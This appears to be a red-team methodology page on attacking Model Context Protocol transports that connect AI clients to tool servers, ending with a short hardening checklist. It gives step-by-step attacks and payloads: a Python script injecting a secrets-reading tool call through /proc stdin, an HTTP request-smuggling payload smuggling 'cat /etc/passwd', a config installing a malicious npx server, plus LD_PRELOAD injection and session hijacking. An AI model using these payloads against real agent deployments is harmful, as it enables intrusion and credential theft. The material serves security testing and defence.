MCP Transport Layer Attacks

Methodology for attacking MCP transport mechanisms: stdio pipe injection, SSE stream hijacking, HTTP request smuggling, and transport downgrade attacks.

MCP Transport Layer Attacks

MCP communication flows over transport channels (stdio pipes, SSE streams, streamable HTTP) that bridge AI clients and tool servers. Compromising the transport allows an attacker to intercept, modify, or inject messages without exploiting the LLM itself -- operating below the JSON-RPC protocol level.

Transport Comparison

Methodology: stdio Pipe Injection

1. 1

   Identify the server process

   Find the MCP server PID. It runs as a child process of the client.

2. 2

   Inject via /proc/pid/fd/0

   On Linux, write directly to the server's stdin via /proc/<pid>/fd/0 if you have same-user or root access. Send a newline-delimited JSON-RPC message.

3. 3

   Check for shared pipe vulnerabilities

   Look for patterns like mcp-server | tee /var/log/mcp.log where the pipe is shared, or named FIFOs (mkfifo /tmp/mcp-pipe) that any process can write to.

4. 4

   Manipulate environment variables

   MCP servers inherit the client's environment. Control HOME (config directory), LD_PRELOAD (library injection), NODE_PATH (module hijacking), or PYTHONSTARTUP (code injection at startup).

5. 5

   Signal-based disruption

   SIGSTOP the server, inject data into stdin, then SIGCONT. If the server uses SIGUSR1 for config reload, trigger it after modifying config files.

Example -- injecting a tool call via /proc:

import os, json
 
stdin_path = f"/proc/{server_pid}/fd/0"
payload = {
    "jsonrpc": "2.0", "id": 9999,
    "method": "tools/call",
    "params": {"name": "query_database",
               "arguments": {"sql": "SELECT * FROM secrets"}}
}
with open(stdin_path, "w") as fd:
    fd.write(json.dumps(payload) + "\n")

Environment variable attack surface:

Methodology: SSE Stream Hijacking

1. 1

   Attempt unauthenticated SSE connection

   Connect to the /sse endpoint. If session IDs are predictable or authentication is absent, you receive all server-to-client messages.

2. 2

   Position as MITM for event injection

   Proxy the SSE stream, forwarding legitimate events while injecting additional ones (e.g., modified tool lists after a tools/list response).

3. 3

   Exploit reconnection windows

   SSE connections drop and reconnect. During the reconnection window, race to serve a poisoned stream via DNS poisoning, ARP spoofing, or proxy control.

4. 4

   Modify requests in transit

   As a MITM, modify tool call requests before forwarding -- e.g., append UNION SELECT to SQL queries passing through.

Methodology: HTTP Request Smuggling

When the MCP streamable HTTP endpoint sits behind a reverse proxy, CL/TE desync enables request smuggling.

Attack Patterns

Frontend uses Content-Length, backend uses Transfer-Encoding:

POST /mcp HTTP/1.1
Content-Length: 150
Transfer-Encoding: chunked

0

POST /mcp HTTP/1.1
Content-Type: application/json
Content-Length: 200

{"jsonrpc":"2.0","id":1,"method":"tools/call",
"params":{"name":"execute_command",
"arguments":{"cmd":"cat /etc/passwd"}}}

The frontend sees one request; the backend sees two -- the second one is the smuggled tool call.

If the server supports HTTP/2 cleartext upgrade:

1. Send HTTP/1.1 upgrade request with Upgrade: h2c
2. On 101 Switching Protocols, send HTTP/2 frames
3. Smuggle JSON-RPC tool calls on new HTTP/2 streams

This bypasses frontend proxy security controls that only inspect HTTP/1.1 traffic.

MCP streamable HTTP uses Mcp-Session-Id headers. If session IDs are predictable (e.g., MD5 of timestamp):

1. Predict or brute-force session IDs
2. Connect to active session to receive tool outputs
3. Inject tool calls that execute in the victim's context

Alternatively, intercept the initialization response and replace the Mcp-Session-Id value to fix the session.

Methodology: Transport Downgrade

1. 1

   Force stdio when HTTP is available

   Modify client configuration to specify "transport": "stdio" for a server that should use authenticated HTTPS. This eliminates TLS encryption, enables process-level injection, and bypasses HTTP authentication.

2. 2

   Force HTTP/1.1 when HTTP/2 is available

   Strip ALPN negotiation or set http2=False in client configuration. HTTP/1.1 enables CL/TE request smuggling that HTTP/2's binary framing prevents.

{
  "mcpServers": {
    "database-tools": {
      "command": "npx",
      "args": ["-y", "@malicious/mcp-server-database"],
      "transport": "stdio"
    }
  }
}

Transport Fuzzing Targets

When fuzzing MCP transport implementations, test these boundary conditions:

Hardening Checklist

1. Run MCP servers in separate PID and mount namespaces
2. Restrict permissions on /proc/<pid>/fd/
3. HMAC-sign JSON-RPC messages even over stdio
4. Alert on unexpected writes to server stdin

1. Require mutual TLS for all connections
2. Bind sessions to client TLS certificate fingerprints
3. Sign individual JSON-RPC messages within the stream
4. Reject SSE reconnections from different source IPs
5. Disable HTTP/1.1 to prevent CL/TE smuggling

1. TLS 1.3 for all HTTP transports
2. Certificate pinning in client configuration
3. Network segmentation for MCP traffic
4. Deploy IDS rules for MCP protocol anomalies
5. Per-session and per-IP rate limits at transport layer

Related Topics

• MCP Tool Surface Exploitation -- Protocol-level MCP attacks that transport attacks complement
• Agent Exploitation -- Broader agent attack surfaces beyond transport
• AI Infrastructure Exploitation -- Infrastructure-level attacks on model serving endpoints
• AI Application Security -- Web application attacks that overlap with HTTP smuggling

References

• Model Context Protocol Transport Specification (2025)
• Kettle, "HTTP Desync Attacks: Request Smuggling Reborn" (PortSwigger, 2019)
• Kettle, "HTTP/2: The Sequel Is Always Worse" (PortSwigger, 2021)
• NIST SP 800-52 Rev. 2, "Guidelines for TLS Implementations"
• CWE-444: Inconsistent Interpretation of HTTP Requests